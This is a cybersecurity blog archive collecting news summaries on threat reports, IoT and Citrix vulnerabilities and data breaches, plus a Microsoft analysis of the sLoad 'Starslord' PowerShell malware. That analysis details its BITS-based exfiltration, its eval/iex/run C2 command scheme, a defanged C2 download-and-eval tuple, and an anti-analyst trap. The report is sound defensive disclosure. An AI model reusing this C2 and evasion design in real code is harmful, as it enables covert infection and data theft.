Category Archives: Cybersecurity

LoRaWAN Encryption Keys Easy to Crack, Jeopardizing Security of IoT Networks

New research from IOActive has found that “blindly” trusting the encryption of the widely adopted device protocol can lead to DDoS, sending of false data and other cyber attacks.

The 2020 Annual Threat Report Blog

Estimated reading time: 2 minutes

As the enterprise security brand of Quick Heal Technologies Ltd., Seqrite develops security management products across endpoints, mobile devices, servers and networks. By building upon our data on threat research, intelligence and cybersecurity, our recently released Annual Threat Report 2020 aim to provide a detailed understanding of malware of 2019.

While the full report can be found on this link, here is a brief summary of the most significant findings from the report:

Malware infection continues to be a threat

Seqrite detected over 146 million malware in 2019 which is massive in number. The highest detection of malware happened in Q4 – 2019 which saw 46 million malware detected. In terms of hourly malware detection highlights for 2019, 16,732 cases were the maximum seen.

Trojan continues to be a danger

In terms of category-wise malware detection statistics, Trojan malware continued to remain popular with just above 25 million detections in 2019. It remained a threat throughout the year, seeing a major upsurge in the last quarter.

Q4 sees a spike in malware

From the data, it is quite evident that malware sees a pronounced spike towards the end of the year. Seqrite detected 46 million malware in Q4, compared to a little above 35 million in Q3, 30 million in Q2 and 25 million in Q1. November and December 2019 also saw the largest number of malware attacks with over 18 million detected in December and above 14 million detected in November.

Real-Time Scan remains a big plus

In terms of malware detection, Real-Time protection methodology is a clear winner and a big differentiator. 51% of malware was detected through Real-Time Scan while the second most effective methodology was Behavioral Detection Scan with 23%. On-Demand Scan came a close third with 22%.

The topmost detected malware

The data showed that the following malware were detected the most on business endpoints:

  • Pioneer.CZ1 was the most detected malware detected on 22% of endpoints. It is a file infector which performs malicious activities sending it to a CNC server.
  • Sality.U was detected on 13% of endpoints and is a file infector which performs a range of harmful activities including stealing confidential data from the system
  • KillAv.Dr was detected on 12% of endpoints stealing IP information and other personal data.

 

The manufacturing sector remains at highest risk

The manufacturing sector saw the highest number of malware attacks in 2019 with over 8 million detections. The education and the professional sectors were second and third on the list with over 7 million and around 6 million attacks, respectively.

APT attacks will continue

The Annual Threat Report 2020 also has a detailed section on Advanced Persistent Threats (APTs) which are designed to infiltrate high-value targets important to national governments such as the military, power grids, nuclear plants, etc. APTs are typically used by nation-states for cyber warfare.

Seqrite analyzed two APT attacks against important Indian government organizations in 2019. Operation m_project is a long-running cyber-espionage campaign against Indian government organizations since 2015 and targets defence organizations, government media houses and protection & security organizations

Seqrite Labs also analyzed the alleged cyber-attack on a Nuclear Power Plant in India and tried to decipher the modus operandi. The incident raised huge questions on the security aspects of critical national infrastructure and it was alleged that an infamous group from North Korea was behind the attack. Seqrite Labs hypothesized that the targeted attack could have been carried out by spear-phishing emails.

Be sure to read the full report for more details on the key findings mentioned in the report. Seqrite continues to be the leading source for the most relevant threat intelligence in the world of enterprise security.

The post The 2020 Annual Threat Report Blog appeared first on Seqrite Blog.

Cyber Threat Trends Dashboard

Marco Ramilli published the Cyber Threat Trends Dashboard, a useful tool that will allow us to better understand most active threats in real time.

Introduction

Information sharing is one of the most important activity that cybersecurity researchers do on daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most of the infosharing activities involved in cybersecurity are mostly focused on Indicator of Compromise such as: URL, IPs, Domains and file hashes which are perfectly used to arm protection tools such as: proxies, ng-firewalls and Antivirus Engines.

Cyber Threat Trends Dashboard

Collecting and analyzing public available samples every single day I became more and more interested on the Cyber threats evolution (Cyber Threats Trend) rather than specific single analyses, which after hundreds of them, could get bored (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). Regarding APT well it’s another cup of tea (a lot of passion in understanding next steps in there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends that are observed over days. The dashboard is available HERE (on top menu TOOLS => Cyber Threat Trends). So far only few basic information are showed, if you would like to see more stats/graph/infos, please feel free to contact me (HERE).

Description

Aim of this dashboard is to monitor trends over thousands even millions of samples providing quantitative analyses on what has observed during the performed automatic analyses. The data in this dashboard is totally auto-generated without control and with no post-processing. You should consider it as raw-data where you can start to elaborate your own research and eventually where you can apply your personal filters or considerations. If you do that, you should be aware that false positives could be behind the corner Let’s move on the current graphs and let’s try to explain what I’d like to show with them but before getting in you should be aware that all the digits on the graphs are expressing percentages and not absolute numbers. Now let’s dig a little bit on them.

Cyber Threat Trends Dashboard
  • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
  • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
  • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “google.com” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.

Conclusion

The introduced dashboard is part of my cybersecurity community contribution as every free tool released on the “Tools” menu box. Cyber Threat Trends dynamically evolves over time and you might find it useful to ask questions about live statistics on cybersecurity threats. If you are a journalist or a cybsec passionate you might find some answers to trending questions to be elaborated over time.

The Cyber Threat Trends Dashboard is available on Marco Ramilli’s blog at the following URL:

Pierluigi Paganini

(SecurityAffairs – Cyber Threat Trends Dashboard, cybersecurity)

The post Cyber Threat Trends Dashboard appeared first on Security Affairs.

Data breach: Why it’s time to adopt a risk-based approach to cybersecurity

The recent high-profile ransomware attack on foreign currency exchange specialist Travelex highlights the devastating results of a targeted cyber-attack. In the weeks following the initial attack, Travelex struggled to bring its customer-facing systems back online. Worse still, despite Travelex’s assurances that no customer data had been compromised, hackers were demanding $6 million for 5GB of sensitive customer information they claim to have downloaded. Providing services to some of the world’s largest banking corporations including HSBC, … More

The post Data breach: Why it’s time to adopt a risk-based approach to cybersecurity appeared first on Help Net Security.

How to detect and prevent issues with vulnerable LoRaWAN networks

IOActive researchers found that the LoRaWAN protocol – which is used across the globe to transmit data to and from IoT devices in smart cities, Industrial IoT, smart homes, smart utilities, vehicle tracking and healthcare – has a host of cyber security issues that could put network users at risk of attack. Such attacks could cause widespread disruption or in extreme cases even put lives at risk. Session Keys and Functions in LoRaWAN v1.0.3 Vulnerable … More

The post How to detect and prevent issues with vulnerable LoRaWAN networks appeared first on Help Net Security.

52% of companies use cloud services that have experienced a breach

Seventy-nine percent of companies store sensitive data in the public cloud, according to a McAfee survey. Anonymized cloud event data showing percentage of files in the cloud with sensitive data While these companies approve an average of 41 cloud services each, up 33 percent from last year, thousands of other services are used ad-hoc without vetting. In addition, 52 percent of companies use cloud services that have had user data stolen in a breach. By … More

The post 52% of companies use cloud services that have experienced a breach appeared first on Help Net Security.

Recommendations for navigating the dynamic cybercrime landscape

In this interview, Mark Sangster, VP & Industry Security Strategist at eSentire, talks about the most pressing issues CISOs are dealing with in today’s fast-fast paced threat environment. How has the cybersecurity threat landscape evolved in the past 5 years? What are some of the most notable threats eSentire is seeing that were not an issue in the past? The past five years have seen significant progress in both the recognition of cybercrime, but also … More

The post Recommendations for navigating the dynamic cybercrime landscape appeared first on Help Net Security.

You can upgrade Windows 7 for free! Why wouldn’t you?

“Doomsday is here! The sky is falling! Windows 7 is out of support and all hell will break loose!” – or, at least, that’s what some cybersecurity experts and press outlets want you to think. In this article, I will offer some advice to businesses of all sizes that may need to continue using Windows 7, while understanding the risk. This is my opinion and should be taken as advice only. Every company is different, … More

The post You can upgrade Windows 7 for free! Why wouldn’t you? appeared first on Help Net Security.

Patients believe stronger privacy protections are more important than easier health data access

Patients and consumers deserve better access to personalized, actionable health care information to empower them to make better, more informed decisions – but it should not drive up health care costs or compromise the privacy of their personal health data, according to a poll of patients and consumers from Morning Consult and America’s Health Insurance Plans (AHIP). Personal privacy outweighs increased transparency A strong majority (62%) of patients want their data and privacy protected more … More

The post Patients believe stronger privacy protections are more important than easier health data access appeared first on Help Net Security.

Lessons from Microsoft’s 250 million data record exposure

Microsoft has one of the best security teams and capabilities of any organization in the technology industry, yet it accidentally exposed 250 million customer records in December 2019. The data was accessible to anyone with a browser, who knew the server location, for about a month in total before an external researcher detected the problem. The database held records of customer support engagements dating back to 2005. Once alerted, Microsoft quickly closed the hole, investigated … More

The post Lessons from Microsoft’s 250 million data record exposure appeared first on Help Net Security.

Seqrite’s top ten most-read blogs in 2019

Estimated reading time: 3 minutes

2019 was an action-packed year for cybersecurity. Nation-states continued their progress towards drafting data protection laws with the world still coming to terms with changing technologies in cybersecurity. Seqrite blogs analyzed the latest trends in the cybersecurity industry — here were the top ten most-read blogs of 2019.

1.     Artificial Intelligence – its Use & Misuse

While the term ‘artificial intelligence’ continues to become more popular and conjure up images of the futuristic technology, it is important to understand what exactly it is. This article provides an explanation of artificial intelligence along with its functionalities in the cybersecurity space. It also articulates the various ways in which AI could be misused.

2.     Can EVMs get hacked? We tell you the truth

The year 2019 saw momentous elections in countries as varied as India, the United Kingdom, Indonesia and Israel. The modern era of technology has given rise to various fears on the question of if Electronic Voting Machines (EVMs) can be hacked? This article analyzes such concerns and provides an answer.

3.     This is how hackers can invade your system without installing malware

Attackers are exploiting systems through a dangerous new technique called file-less malware. This type of malware enters systems without alerting cybersecurity solutions, rendering them very dangerous. This article explains how attacks are deployed using this malware and how to prevent them.

4.     Employees working on their personal device? Here’s how to secure them

The Bring Your Own Device revolution has heralded a huge rise in the number of personal devices in the enterprise network. While employees love using their own personal devices for work, these actions have their own security risks and this article explains how to secure personal devices.

5.      The banking sector’s top cybersecurity challenges

In the last few years, the banking sector has seen some major cyber attacks that have resulted in damaging financial repercussions. This is a sector which is at great risk to cybersecurity challenges and this article explains how to deal with some of the top challenges.

6.     5 Cybersecurity Best Practices For Your Small to Medium-Size Business

Small to Medium-Size Businesses (SMEs) often underestimate cybersecurity risks under a mistaken assumption that they will not be targeted by attackers. Ironically, they could actually be at a higher risk. This article outlines the top 5 cybersecurity best practices for SMEs.

7.     The healthcare industry’s largest cyber challenges

The healthcare sector sees a tremendous penetration of cyber attacks every year. The cost of cyber attacks on healthcare can also potentially be devastating as it can have life-and-death consequences. This article explains why the healthcare industry represents such a big cyber risk and what the challenges it faces are.

8.     What happens when you don’t patch your software?

In 2017, the WannaCry ransomware caused chaos across more than 300,000 systems across different countries. The scale of the attack was momentous and the root cause of it was unpatched systems. This article highlights the danger of letting systems remain unpatched and the troubling consequences that can emerge.

9.     How to reduce the cost of data leakage when an employee is Out Of Office

Vacation periods often see a spike in cyber attacks as employees get carried away and become negligent about cybersecurity. It’s important for enterprises to understand this and invest in solutions like Data Loss Prevention (DLP). This article provides some solutions on how to ensure enterprise cybersecurity remains robust while employees are Out of Office.

10.    Cybersecurity roundup – January to April 2019

The first four months of the year saw a flurry of cyberattacks from across the globe. Whether it was Facebook accidentally uploading email contacts of 1.5 million users or personal data of German politicians being leaked, this article provides an overview of the top cybersecurity news between January and April 2019.

Did we miss out on anything? Tell us!

The post Seqrite’s top ten most-read blogs in 2019 appeared first on Seqrite Blog.

CISOs: Make 2020 the year you focus on third-party cyber risk

While cybersecurity professionals are certainly aware of the growing threat posed by sharing data with third parties, many seem to lack the urgency required to address this challenge. If there is one work-related New Year’s resolution I’d like CISOs to make as we enter 2020, it’s to give the challenge of third-party cyber risk the attention it needs. In fact, I no longer see this as optional or as an extension of an enterprise risk … More

The post CISOs: Make 2020 the year you focus on third-party cyber risk appeared first on Help Net Security.

More authentication and identity tech needed with fraud expected to increase

The proliferation of real-time payments platforms, including person-to-person (P2P) transfers and mobile payment platforms across Asia Pacific, has increased fraud losses for the majority of banks. FICO recently conducted a survey with banks in the region and found that 4 out of 5 (78 percent) have seen their fraud losses increase. Further to this, almost a quarter (22 percent) say that fraud will rise significantly in the next 12 months, with an additional 58 percent … More

The post More authentication and identity tech needed with fraud expected to increase appeared first on Help Net Security.

IoC Scanner shows if Citrix appliances have been compromised via CVE-2019-19781

Citrix and FireEye have teamed up to provide sysadmins with an IoC scanner that shows whether a Citrix ADC, Gateway or SD-WAN WANOP appliance has been compromised via CVE-2019-19781. Finding evidence of compromise By now it should be widely known that CVE-2019-19781 – aka “Shitrix” – is a real and present danger: exploits for it abound and attackers are using them, while we wait for fixes for all affected devices to be released. Though the … More

The post IoC Scanner shows if Citrix appliances have been compromised via CVE-2019-19781 appeared first on Help Net Security.

Cybercriminals using fake job listings to steal money, info from applicants

Be extra careful when looking for a job online, the Internet Crime Complaint Center (IC3) warns: cybercriminals are using fake job listings to trick applicants into sharing their personal and financial information, as well as into sending them substantial sums of money. “While hiring scams have been around for many years, cyber criminals’ emerging use of spoofed websites to harvest PII and steal money shows an increased level of complexity. Criminals often lend credibility to … More

The post Cybercriminals using fake job listings to steal money, info from applicants appeared first on Help Net Security.

Zero Trust: Beyond access controls

As the Zero Trust approach to cybersecurity gains traction in the enterprise world, many people have come to recognize the term without fully understanding its meaning. One common misconception: Zero Trust is all about access controls and additional authentication, such as multi-factor authentication. While these two things help organizations get to a level of Zero Trust, there is more to it: a Zero Trust approach is really an organization-wide architecture. Things aren’t always as they … More

The post Zero Trust: Beyond access controls appeared first on Help Net Security.

There is no easy fix to AI privacy problems

Artificial intelligence – more specifically, the machine learning (ML) subset of AI – has a number of privacy problems. Not only does ML require vast amounts of data for the training process, but the derived system is also provided with access to even greater volumes of data as part of the inference processing while in operation. These AI systems need to access and “consume” huge amounts of data in order to exist and, in many … More

The post There is no easy fix to AI privacy problems appeared first on Help Net Security.

FBI Shuts Down Website Trafficking in Breached Data

The FBI has seized the domain of WeLeakInfo.com, an online service that sold data from hacked and breached websites.

The domain seizure and termination of WeLeakInfo’s services was the result of a joint operation with the UK National Crime Agency, the Netherlands National Police Corps, the German Bundeskriminalamt (the Federal Criminal Police Office of Germany), and the Police Service of Northern Ireland. 

“The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts.  The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months),” wrote the Justice Department in a public statement.

Records were available on the site for as little as $2 for a single day’s use, or $70 per month for unlimited access to the breached data.

Dutch authorities arrested a 22-year-old man on suspicion of operating the site following the seizure.

The relative frequency and scope of data breaches over the last several years has created a secondary market for aggregated records. Another site offering access to breached passwords, LeakedSource, was seized by Canadian authorities in 2017.

The post FBI Shuts Down Website Trafficking in Breached Data appeared first on Adam Levin.

Container security requires continuous security in new DevSecOps models

When Jordan Liggitt at Google posted details of a serious Kubernetes vulnerability in November 2018, it was a wake-up call for security teams ignoring the risks that came with adopting a cloud-native infrastructure without putting security at the heart of the whole endeavor. For such a significant milestone in Kubernetes history, the vulnerability didn’t have a suitably alarming name comparable to the likes of Spectre, Heartbleed or the Linux Kernel’s recent SACK Panic; it was … More

The post Container security requires continuous security in new DevSecOps models appeared first on Help Net Security.

Email security industry miss rates when encountering threats are higher than 20%

Email security miss rates are definitely a huge issue. Malicious files regularly bypass all of today’s leading email security products, leaving enterprises vulnerable to email-based attacks including ransomware, phishing and data breaches, according to BitDam. BitDam conducted an empirical study to measure leading email security products’ ability to detect unknown threats at first encounter. Unknown threats are produced in the wild, sometimes hundreds in a day. The study employs the retrieval of fresh samples of … More

The post Email security industry miss rates when encountering threats are higher than 20% appeared first on Help Net Security.

sLoad launches version 2.0, Starslord

sLoad, the PowerShell-based Trojan downloader notable for its almost exclusive use of the Windows BITS service for malicious activities, has launched version 2.0. The new version comes on the heels of a comprehensive blog we published detailing the malware’s multi-stage nature and use of BITS as alternative protocol for data exfiltration and other behaviors.

With the new version, sLoad has added the ability to track the stage of infection on every affected machine. Version 2.0 also packs an anti-analysis trick that could identify and isolate analyst machines vis-à-vis actual infected machines.

We’re calling the new version “Starslord” based on strings in the malware code, which has clues indicating that the name sLoad may have been derived from a popular comic book superhero.

We discovered the new sLoad version over the holidays, in our continuous monitoring of the malware. New sLoad campaigns that use version 2.0 follow an attack chain similar to the previous version, with some updates, including dropping the dynamic list of command-and-control (C2) servers and upload of screenshots.

Tracking the stage of infection

With the ability to track the stage of infection, malware operators with access to the Starslord backend could build a detailed view of infections across affected machines and segregate these machines into different groups.

The tracking mechanism exists in the final-stage, which, as with the old version, loops infinitely (with sleep interval of 2400 seconds, higher than the 1200 seconds in version 1.0). In line with the previous version, at every iteration of the final stage, the malware uses a download BITS job to exfiltrate stolen system information and receive additional payloads from the active C2 server.

As we noted in our previous blog, creating a BITS job with an extremely large RemoteURL parameter that includes non-encrypted system information, as the old sLoad version did, stands out and is relatively easy to detect. However, with Starslord, the system information is encoded into Base64 data before being exfiltrated.

The file received by Starslord in response to the exfiltration BITS job contains a tuple of three values separated by an asterisk (*):

  • Value #1 is a URL to download additional payload using a download BITS job
  • Value #2 specifies the action, which can be any of the following, to be taken on the payload downloaded from the URL in value#1:
    • “eval” – Run (possibly very large) PowerShell scripts
    • “iex” – Load and invoke (possibly small) PowerShell code
    • “run” – Download encoded PE file, decode using exe, and run the decoded executable
  • Value #3 is an integer that can signify the stage of infection for the machine

Supplying the payload URL as part of value #1 allows the malware infrastructure to house additional payloads on different servers from the active C2 servers responding to the exfiltration BITS jobs.

Value#3 is the most noteworthy component in this setup. If the final stage succeeds in downloading additional payload using the URL provided in value #1 and executing it as specified by the command in value #2, then a variable is used to form the string “td”:”<value#3>”,”tds”:”3”. However, if the final stage fails to download and execute the payload, then the string formed is “td”:”<value #3>”,”tds”:”4”.

The infinite loop ensures that the exfiltration BITS jobs are created at a fixed interval. The backend infrastructure can then pick up the pulse from each infected machine. However, unlike the previous version, Starslord includes the said string in succeeding iterations of data exfiltration. This means that the malware infrastructure is always aware of the exact stage of the infection for a specific affected machine. In addition, since the numeric value for value #3 in the tuple is always governed by the malware infrastructure, malware operators can compartmentalize infected hosts and could potentially set off individual groups on unique infection paths. For example, when responding to exfiltration BITS jobs, malware operators can specify a different URL (value #1) and action (value #2) for each numeric value for value #3 of the tuple, essentially deploying a different malware payload for different groups.

Anti-analysis trap

Starslord comes built-in with a function named checkUniverse, which is in-fact an anti-analysis trap.

As mentioned in our previous blog post, the final stage of sLoad is a piece of PowerShell code obtained by decoding one of the dropped .ini files. The PowerShell code appears in the memory as a value assigned to a variable that is then executed using the Invoke-Expression cmdlet. Because this is a huge piece of decrypted PowerShell code that never hits the disk, security researchers would typically dump it into a file on the disk for further analysis.

The sLoad dropper PowerShell script drops four files:

  • a randomly named .tmp file
  • a randomly named .ps1 file
  • a ini file
  • a ini file

It then creates a scheduled task to run the .tmp file every 3 minutes, similar to the previous version. The .tmp file is a proxy that does nothing but run the .ps1 file, which decrypts the contents of main.ini into the final stage. The final stage then decrypts contents of domain.ini to obtain active C2 and perform other activities as documented.

As a unique anti-analysis trap, Starslord ensures that the .tmp and.ps1 files have the same random name. When an analyst dumps the decrypted code of the final stage into a file in the same folder as the .tmp and .ps1 files, the analyst could end up naming it something other than the original random name. When this dumped code is run from such differently named file on the disk, a function named checkUniverse returns the value 1, and the analyst gets trapped:

What comes next is not very desirable for a security researcher: being profiled by the malware operator.

If the host belongs to a trapped analyst, the file downloaded from the backend in response to the exfiltration BITS job, if any, is discarded and overwritten by the following new tuple:

hxxps://<active C2>/doc/updx2401.jpg*eval*-1

In this case, the value #1 of the tuple is a URL that’s known to the backend for being associated with trapped hosts. BITS jobs from trapped hosts don’t always get a response. If they do, it’s a copy of the dropper PowerShell script. This could be to create an illusion that the framework is being updated as the URL in value #1 of the tuple suggests (hxxps://<active C2>/doc/updx2401.jpg).

However, the string that is included in all successive exfiltration BITS jobs from such host is “td”:”-1”,”tds”:”3”, eventually leading to all such hosts getting grouped under value “td”:”-1”. This forms the group of all trapped machines that are never delivered a payload. For the rest, so far, evidence suggests that it has been delivering the file infector Ramnit intermittently.

Durable protection against evolving malware

sLoad’s multi-stage attack chain, use of mutated intermediate scripts and BITS as an alternative protocol, and its polymorphic nature in general make it a piece malware that can be quite tricky to detect. Now, it has evolved into a new and polished version Starlord, which retains sLoads most basic capabilities but does away with spyware capabilities in favor of new and more powerful features, posing even higher risk.

Starslord can track and group affected machines based on the stage of infection, which can allow for unique infection paths. Interestingly, given the distinct reference to a fictional superhero, these groups can be thought of as universes in a multiverse. In fact, the malware uses a function called checkUniverse to determine if a host is an analyst machine.

Microsoft Threat Protection defends customers from sophisticated and continuously evolving threats like sLoad using multiple industry-leading security technologies that protect various attack surfaces. Through signal-sharing across multiple Microsoft services, Microsoft Threat Protection delivers comprehensive protection for identities, endpoints, data, apps, and infrastructure.

On endpoints, behavioral blocking and containment capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) ensure durable protection against evolving threats. Through cloud-based machine learning and data science informed by threat research, Microsoft Defender ATP can spot and stop malicious behaviors from threats, both old and new, in real-time.

 

 

Sujit Magar

Microsoft Defender ATP Research Team

The post sLoad launches version 2.0, Starslord appeared first on Microsoft Security.

First patches for the Citrix ADC, Gateway RCE flaw released

As attackers continue to hit vulnerable Citrix (formerly Netscaler) ADC and Gateway installations, Citrix has released permanent fixes for some versions and has promised to provide them for other versions and for two older versions of SD-WAN WANOP by January 24. A short timeline before the situation update CVE-2019-19781, a critical vulnerability affecting Citrix ADC and Gateway that may allow unauthenticated attackers to achieve remote code execution and obtain direct access to an organization’s local … More

The post First patches for the Citrix ADC, Gateway RCE flaw released appeared first on Help Net Security.

Researchers create OT honeypot, attract exploits and fraud

Trend Micro announced the results of research featuring a honeypot imitating an industrial factory. The highly sophisticated Operational Technology (OT) honeypot attracted fraud and financially motivated exploits. Hardware equipment that ran the factory Complex investigation The six-month investigation revealed that unsecured industrial environments are primarily victims of common threats. The honeypot was compromised for cryptocurrency mining, targeted by two separate ransomware attacks, and used for consumer fraud. “Too often, discussion of cyber threats to industrial … More

The post Researchers create OT honeypot, attract exploits and fraud appeared first on Help Net Security.

Mitsubishi Electric discloses data breach, possible data leak

Japanese multinational Mitsubishi Electric has admitted that it had suffered a data breach some six months ago, and that “personal information and corporate confidential information may have been leaked.” The company, though, claims that “sensitive information on social infrastructure such as defense, electric power, and railways, highly confidential technical information, and important information concerning business partners have not been leaked.” What was compromised in the Mitsubishi Electric data breach? Mitsubishi Electric is a manufacturer of … More

The post Mitsubishi Electric discloses data breach, possible data leak appeared first on Help Net Security.

Data-driven vehicles: The next security challenge

Companies are increasingly building smart products that are tailored to know the individual user. In the automotive world, the next generation passenger vehicle could behave like a personal chauffeur, sentry and bodyguard rolled into one. Over the next decade, every car manufacturer that offers any degree of autonomy in a vehicle will be forced to address the security of both the vehicle and your data, while also being capable of recognizing and defending against threats … More

The post Data-driven vehicles: The next security challenge appeared first on Help Net Security.

Review: Enzoic for Active Directory

Seemingly every day news drops that a popular site with millions of users had been breached and its user database leaked online. Almost without fail, attackers try to use those leaked user credentials on other sites, making password stuffing one of the most common attacks today. Users often use the same username/email and password combination for multiple accounts and, unfortunately, enterprise accounts are no exception. Attackers can, therefore, successfully use leaked credentials to access specific … More

The post Review: Enzoic for Active Directory appeared first on Help Net Security.

Techniques and strategies to overcome Kubernetes security challenges

Five security best practices for DevOps and development professionals managing Kubernetes deployments have been introduced by Portshift. Integrating these security measures into the early stages of the CI/CD pipeline will assist organizations in the detection of security issues earlier, allowing security teams to remediate issues quickly. Kubernetes as the market leader The use of containers continues to rise in popularity in test and production environments, increasing demand for a means to manage and orchestrate them. … More

The post Techniques and strategies to overcome Kubernetes security challenges appeared first on Help Net Security.

A look at cybersecurity for rail systems, building automation and the future of critical infrastructure

Waterfall Security Solutions announced a major expansion into new markets and industry verticals. In support of this expansion, Waterfall has secured a significant new funding round to enable aggressive growth. We caught up with Lior Frenkel, CEO and co-founder of the company, to find out more. So Lior, you folks just announced a big new expansion and investment. What are your main priorities for Waterfall Security in the next 5 years? Well, let me first … More

The post A look at cybersecurity for rail systems, building automation and the future of critical infrastructure appeared first on Help Net Security.

NIST Privacy Framework 1.0: Manage privacy risk, demonstrate compliance

Our data-driven society has a tricky balancing act to perform: building innovative products and services that use personal data while still protecting people’s privacy. To help organizations keep this balance, the National Institute of Standards and Technology (NIST) is offering a new tool for managing privacy risk. Version 1.0 of the NIST Privacy Framework The agency has just released Version 1.0 of the NIST Privacy Framework: A Tool for Improving Privacy through Enterprise Risk Management. … More

The post NIST Privacy Framework 1.0: Manage privacy risk, demonstrate compliance appeared first on Help Net Security.

Security Affairs newsletter Round 247

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Google removed 1.7K+ Joker Malware infected apps from its Play Store
MageCart attack hit Australia bushfire Donors
New Bill prohibits intelligence sharing with countries using Huawei 5G equipment
5G – The Future of Security and Privacy in Smart Cities
Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info
Hacker that hit UK National Lottery in 2016 was sentenced to prison
Maze Ransomware operators leak 14GB of files stolen from Southwire
US officials meet UK peers to remark the urgency to ban Huawei 5G tech
China-linked APT40 group hides behind 13 front companies
Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution
January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager
Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?
Hacker offers for sale 49 million user records from US data broker LimeLeads
Iranian Threat Actors: Preliminary Analysis
Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA
P&N Bank data breach may have impacted 100,000 West Australians
VMware addresses flaws in VMware Tools and Workspace ONE SDK
5ss5c Ransomware emerges after Satan went down in the hell
Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins
Hundreds of million users installed Android fleeceware apps from Google Play
Two PoC exploits for CVE-2020-0601 NSACrypto flaw released
Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity
Expert released PoC exploits for recently disclosed Cisco DCNM flaws
Hack the Army bug bounty program paid $275,000 in rewards
Law enforcement seized WeLeakInfo.com for selling access to data from data breaches
Cybercrime Statistics in 2019
Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day
Turkish Hackers hit Greek Government websites and local stock exchange

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 247 appeared first on Security Affairs.

IoT cybersecurity’s worst kept secret

By improving access to data and taking advantage of them in fundamentally different ways to drive profitability, IT security executives are rapidly changing perceptions of their office. Although making better sense of and use of data may be standard fare in other areas of the enterprise, who knew that modern IoT cybersecurity solutions would become network security’s newest professional lever? Actually, we should have seen it coming, because digital transformation always starts with visibility and … More

The post IoT cybersecurity’s worst kept secret appeared first on Help Net Security.

How to govern cybersecurity risk at the board level

Rapidly evolving cybersecurity threats are now commanding the attention of senior business leaders and boards of directors and are no longer only the concern of IT security professionals. A report from University of California, Berkeley’s Center for Long-Term Cybersecurity (CLTC) and Booz Allen Hamilton uses insights gleaned from board members with over 130 years of board service across nine industry sectors to offer guidance for boards of directors in managing cybersecurity within large global companies. … More

The post How to govern cybersecurity risk at the board level appeared first on Help Net Security.

Worldwide IT spending to total $3.9 trillion in 2020

Worldwide IT spending is projected to total $3.9 trillion in 2020, an increase of 3.4% from 2019, according to the latest forecast by Gartner. Global IT spending is expected to cross into $4 trillion territory next year. “Although political uncertainties pushed the global economy closer to recession, it did not occur in 2019 and is still not the most likely scenario for 2020 and beyond,” said John-David Lovelock, distinguished research vice president at Gartner. “With … More

The post Worldwide IT spending to total $3.9 trillion in 2020 appeared first on Help Net Security.

Changing the monolith—Part 2: Whose support do you need?

In Changing the monolith—Part 1: Building alliances for a secure culture, I explored how security leaders can build alliances and why a commitment to change must be signaled from the top. But whose support should you recruit in the first place? In Part 2, I address considerations for the cybersecurity team itself, the organization’s business leaders, and the employees whose buy-in is critical.

Build the right cybersecurity team

It could be debated that the concept of a “deep generalist” is an oxymoron. The analogy I frequently find myself making is you would never ask a dermatologist to perform a hip replacement. A hip replacement is best left to an orthopedic surgeon who has many hours of hands-on experience performing hip replacements. This does not lessen the importance of the dermatologist, who can quickly identify and treat potentially lethal diseases such as skin cancer.

Similarly, not every cybersecurity and privacy professional is deep in all subjects such as governance, technology, law, organizational dynamics, and emotional intelligence. No person is born a specialist.

If you are looking for someone who is excellent at threat prevention, detection, and incident response, hire someone who specializes in those specific tasks and has demonstrated experience and competency. Likewise, be cautious of promoting cybersecurity architects to the role of Chief Information Security Officer (CISO) if they have not demonstrated strategic leadership with the social aptitude to connect with other senior leaders in the organization. CISOs, after all, are not technology champions as much as they are business leaders.

Keep business leaders in the conversation

Leaders can enhance their organizations’ security stance by sending a top-down message across all business units that “security begins with me.” One way to send this message is to regularly brief the executive team and the board on cybersecurity and privacy risks.

Image of three coworkers working at a desk in an office.

Keep business leaders accountable about security.

These should not be product status reports, but briefings on key performance indicators (KPI) of risk. Business leaders must inform what the organization considers to be its top risks.

Here are three ways to guide these conversations:

  1. Evaluate the existing cyber-incident response plan within the context of the overall organization’s business continuity plan. Elevate cyber-incident response plans to account for major outages, severe weather, civil unrest, and epidemics—which all place similar, if not identical, stresses to the business. Ask leadership what they believe the “crown jewels” to be, so you can prioritize your approach to data protection. The team responsible for identifying the “crown jewels” should include senior management from the lines of businesses and administrative functions.
  2. Review the cybersecurity budget with a business case and a strategy in mind. Many times, security budgets take a backseat to other IT or business priorities, resulting in companies being unprepared to deal with risks and attacks. An annual review of cybersecurity budgets tied to what looks like a “good fit” for the organization is recommended.
